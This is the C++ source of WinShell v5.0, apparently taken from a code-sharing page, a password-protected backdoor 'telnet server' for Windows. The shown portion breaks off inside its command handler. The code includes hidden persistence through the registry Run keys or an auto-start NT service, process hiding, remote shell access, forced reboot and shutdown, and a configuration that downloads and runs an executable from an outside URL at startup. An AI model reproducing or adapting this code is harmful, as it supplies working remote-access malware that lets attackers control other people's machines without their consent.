📄 winshell.cpp
字号:
//-------------------------------------------------------------------------------//
// WinShell v5.0 Source Code for Visual C++ 6.0 //
// //
// -->> Everyone free to use, modify, recompile!!! Open it for Internet //
// //
// Author: Mr.Janker //
// HomePage: http://www.janker.org //
// Publisher: http://www.hackbase.com //
// Release: 10/1/2004 //
// Reference: Netcat //
//-------------------------------------------------------------------------------//
/*
WinShell v5.0 - A finished telnet server for windows
WinShell was a telnet server for windows platform. Main program was just a 5k
bytes stand-alone executable file, Could run stably without any third dll, Although
it was so thin, it had many of functions, such as custom port, password protect,
muti-user logon, NT Service mode, download file,user-defined message, special
anti-ddos and etc. Detail to see the following:
01. Designed for Windows 9X/ME/NT/2K/XP
02. Just a stand-alone executable file and no setup
03. Support all of the standard telnet client
04. Allow muti-user logon and password authentication
05. Custom port number and other configurable item
06. Run in the background without gui
07. Support service mode in NT system
08. Build-in install and remove
09. Build-in file download
10. Build-in reboot and shutdown
11. Build-in terminate itself remotely
12. Auto download file and execute while starting
13. Special anti-ddos flood attack
14. Support EXE Compress and Protect program
FAQ:
1. I could compile winshell with other compiler?
Answer: Yes! such as VC++, BCB, lcc32, Dev C++, and etc.
2. How to make a 5k winshell.exe?
Answer: Use lcc32 compiler and compress it with FSG exepacker.
----------------------------------------------------------------------------------*/
#include "stdafx.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#include <winsvc.h>
#include <urlmon.h>
#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "urlmon.lib")
#define MAX_USER 999 // max clients
#define BUF_SOCK 200 // sock buffer
#define KEY_BUFF 255 // input buffer
#define REBOOT 0 // Reboot
#define SHUTDOWN 1 // Shutdown
#define DEF_PORT 5277 // listening port
#define REG_LEN 16 // registry key length
#define SVC_LEN 80 // nt service name length
// define winapi to use from dll
typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD);
typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG);
typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded);
typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize);
// pipe session structure
struct SESSION_DATA {
HANDLE ReadPipeHandle;
HANDLE WritePipeHandle;
HANDLE ProcessHandle;
SOCKET ClientSocket;
HANDLE ReadShellThreadHandle;
HANDLE WriteShellThreadHandle;
};
// winshell configuration
struct WSCFG {
int ws_port; // listening port
char ws_passstr[REG_LEN]; // password string
int ws_autoins; // autoinstall flag, 1=yes 0=no
char ws_regname[REG_LEN]; // registry subkey name
char ws_svcname[REG_LEN]; // ntservice name
char ws_svcdisp[SVC_LEN]; // ntervice show name
char ws_svcdesc[SVC_LEN]; // ntservice descripition Name
char ws_passmsg[SVC_LEN]; // password prompt message
int ws_downexe; // downexec flag, 1=yes 0=no
char ws_fileurl[SVC_LEN]; // downfile url, "http://xxx/file.exe"
char ws_filenam[SVC_LEN]; // downsave filename
};
// default winshell configuration
struct WSCFG wscfg={DEF_PORT,
"1234",
1,
"winshell",
"winshell",
"WinShell Service",
"Provide Windows CmdShell Service",
"Password: ",
1,
"http://www.janker.org/winshell.exe",
"winshell.exe"
};
// message define area
char *msg_ws_copyright="\n\rWinShell v5.0 (C)2002 janker.org\n\r";
char *msg_ws_prompt="\n\r? for help\n\rCMD>";
char *msg_ws_cmd="\n\ri Install\n\rr Remove\n\rp Path\n\rb reBoot\n\rd shutDown\n\rs Shell\n\rx eXit\n\rq Quit\n\r\n\rDownload:\n\rCMD>http://.../srv.exe\n\r";
char *msg_ws_ext="\n\rExit.";
char *msg_ws_end="\n\rQuit.";
char *msg_ws_boot="\n\rReboot...";
char *msg_ws_poff="\n\rShutdown...";
char *msg_ws_down="\n\rSave to ";
char *msg_ws_err="\n\rErr!";
char *msg_ws_ok="\n\rOK!";
char ExeFile[MAX_PATH];
int nUser = 0;
HANDLE handles[MAX_USER];
int OsIsNt;
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE hServiceStatusHandle;
// declare routine
int Install(void);
int Uninstall(void);
int DownloadFile(char *sURL, SOCKET wsh);
int Boot(int flag);
void HideProc(void);
int GetOsVer(void);
int WinShell(SOCKET wsl);
void TalkWithClient(void *cs);
int CmdShell(SOCKET sock);
int StartFromService(void);
int StartWinShell(LPSTR lpCmdLine);
static HANDLE StartShell(HANDLE StdinPipeHandle,HANDLE StdoutPipeHandle);
static VOID SessionReadShellThreadFn(LPVOID Parameter);
static VOID SessionWriteShellThreadFn(LPVOID Parameter);
VOID WINAPI NTServiceMain( DWORD dwArgc, LPTSTR *lpszArgv );
VOID WINAPI NTServiceHandler( DWORD fdwControl );
// configuration data and tables
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{wscfg.ws_svcname, NTServiceMain},
{NULL, NULL}
};
// install self
int Install(void)
{
char svExeFile[MAX_PATH];
HKEY key;
strcpy(svExeFile,ExeFile);
// if win9x, install as service application
if(!OsIsNt) {
if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
RegCloseKey(key);
if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
RegSetValueEx(key,wscfg.ws_regname,0,REG_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));
RegCloseKey(key);
return 0;
}
}
}
else {
// if nt, install as ntservice
SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_CREATE_SERVICE);
if (schSCManager!=0)
{
SC_HANDLE schService = CreateService
(
schSCManager,
wscfg.ws_svcname,
wscfg.ws_svcdisp,
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS ,
SERVICE_AUTO_START,
SERVICE_ERROR_NORMAL,
svExeFile,
NULL,
NULL,
NULL,
NULL,
NULL
);
if (schService!=0)
{
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
strcpy(svExeFile,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(svExeFile,wscfg.ws_svcname);
if(RegOpenKey(HKEY_LOCAL_MACHINE,svExeFile,&key)==ERROR_SUCCESS) {
RegSetValueEx(key,"Description",0,REG_SZ,(BYTE *)wscfg.ws_svcdesc,lstrlen(wscfg.ws_svcdesc));
RegCloseKey(key);
return 0;
}
}
CloseServiceHandle(schSCManager);
}
}
return 1;
}
// uninstall self
int Uninstall(void)
{
HKEY key;
if(!OsIsNt) {
if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&key)==ERROR_SUCCESS) {
RegDeleteValue(key,wscfg.ws_regname);
RegCloseKey(key);
if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",&key)==ERROR_SUCCESS) {
RegDeleteValue(key,wscfg.ws_regname);
RegCloseKey(key);
return 0;
}
}
}
else {
SC_HANDLE schSCManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager!=0)
{
SC_HANDLE schService = OpenService( schSCManager, wscfg.ws_svcname, SERVICE_ALL_ACCESS);
if (schService!=0)
{
if(DeleteService(schService)!=0) {
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
return 0;
}
CloseServiceHandle(schService);
}
CloseServiceHandle(schSCManager);
}
}
return 1;
}
// download file from the appointed url
int DownloadFile(char *sURL, SOCKET wsh)
{
HRESULT hr;
char seps[]= "/";
char *token;
char *file;
char myURL[MAX_PATH];
char myFILE[MAX_PATH];
strcpy(myURL,sURL);
token=strtok(myURL,seps);
while(token!=NULL)
{
file=token;
token=strtok(NULL,seps);
}
GetCurrentDirectory(MAX_PATH,myFILE);
strcat(myFILE, "\\");
strcat(myFILE, file);
send(wsh,myFILE,strlen(myFILE),0);
send(wsh,"...",3,0);
hr = URLDownloadToFile(0, sURL, myFILE, 0, 0);
if(hr==S_OK)
return 0;
else
return 1;
}
// boot routine
int Boot(int flag)
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(OsIsNt) {
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
if(flag==REBOOT) {
if(ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0))
return 0;
}
else {
if(ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0))
return 0;
}
}
else {
if(flag==REBOOT) {
if(ExitWindowsEx(EWX_REBOOT + EWX_FORCE,0))
return 0;
}
else {
if(ExitWindowsEx(EWX_SHUTDOWN + EWX_FORCE,0))
return 0;
}
}
return 1;
}
// hide process in win9x
void HideProc(void)
{
HINSTANCE hKernel=LoadLibrary("Kernel32.dll");
if ( hKernel != NULL )
{
pREGISTERSERVICEPROCESS *pRegisterServiceProcess=(pREGISTERSERVICEPROCESS *)GetProcAddress(hKernel,"RegisterServiceProcess");
( *pRegisterServiceProcess)(GetCurrentProcessId(),1);
FreeLibrary(hKernel);
}
return;
}
// get OS version
int GetOsVer(void)
{
OSVERSIONINFO winfo;
winfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&winfo);
if(winfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
return 1;
else
return 0;
}
// handle client routine
int WinShell(SOCKET wsl)
{
SOCKET wsh;
struct sockaddr_in client;
DWORD myID;
while(nUser<MAX_USER)
{
int nSize=sizeof(client);
wsh=accept(wsl,(struct sockaddr *)&client,&nSize);
if(wsh==INVALID_SOCKET) return 1;
handles[nUser]=CreateThread(0,1000,(LPTHREAD_START_ROUTINE) TalkWithClient,(VOID *) wsh, 0, &myID);
if(handles[nUser]==0)
closesocket(wsh);
else
nUser++;
}
WaitForMultipleObjects(MAX_USER,handles,TRUE,INFINITE);
return 0;
}
// close socket
void CloseIt(SOCKET wsh)
{
closesocket(wsh);
nUser--;
ExitThread(0);
}
// handle the client request
void TalkWithClient(void *cs)
{
SOCKET wsh=(SOCKET)cs;
char pwd[SVC_LEN];
char cmd[KEY_BUFF];
char chr[1];
int i,j;
while (nUser < MAX_USER) {
if(wscfg.ws_passstr) {
if(strlen(wscfg.ws_passmsg)) send(wsh,wscfg.ws_passmsg,strlen(wscfg.ws_passmsg),0);
ZeroMemory(pwd,KEY_BUFF);
i=0;
while(i<SVC_LEN) {
// set timeout
fd_set FdRead;
struct timeval TimeOut;
FD_ZERO(&FdRead);
FD_SET(wsh,&FdRead);
TimeOut.tv_sec=6;
TimeOut.tv_usec=0;
int Er=select(wsh+1, &FdRead, NULL, NULL, &TimeOut);
if((Er==SOCKET_ERROR) || (Er==0)) CloseIt(wsh);
if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
pwd[i]=chr[0];
if(chr[0]==0xd || chr[0]==0xa) {
pwd[i]=0;
break;
}
i++;
}
// if invalid user, close the socket
if(strcmp(pwd,wscfg.ws_passstr)) CloseIt(wsh);
}
send(wsh,msg_ws_copyright,strlen(msg_ws_copyright),0);
send(wsh,msg_ws_prompt,strlen(msg_ws_prompt),0);
while(1) {
ZeroMemory(cmd,KEY_BUFF);
// auto support standard telnet client
j=0;
while(j<KEY_BUFF) {
if(recv(wsh,chr,1,0)==SOCKET_ERROR) CloseIt(wsh);
cmd[j]=chr[0];
if(chr[0]==0xa || chr[0]==0xd) {
cmd[j]=0;
break;
}
j++;
}
// download file
if(strstr(cmd,"http://")) {
send(wsh,msg_ws_down,strlen(msg_ws_down),0);
if(DownloadFile(cmd,wsh))
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
}
else {
switch(cmd[0]) {
// help
case '?': {
send(wsh,msg_ws_cmd,strlen(msg_ws_cmd),0);
break;
}
// install
case 'i': {
if(Install())
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
break;
}
// uninstall
case 'r': {
if(Uninstall())
send(wsh,msg_ws_err,strlen(msg_ws_err),0);
else
send(wsh,msg_ws_ok,strlen(msg_ws_ok),0);
break;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -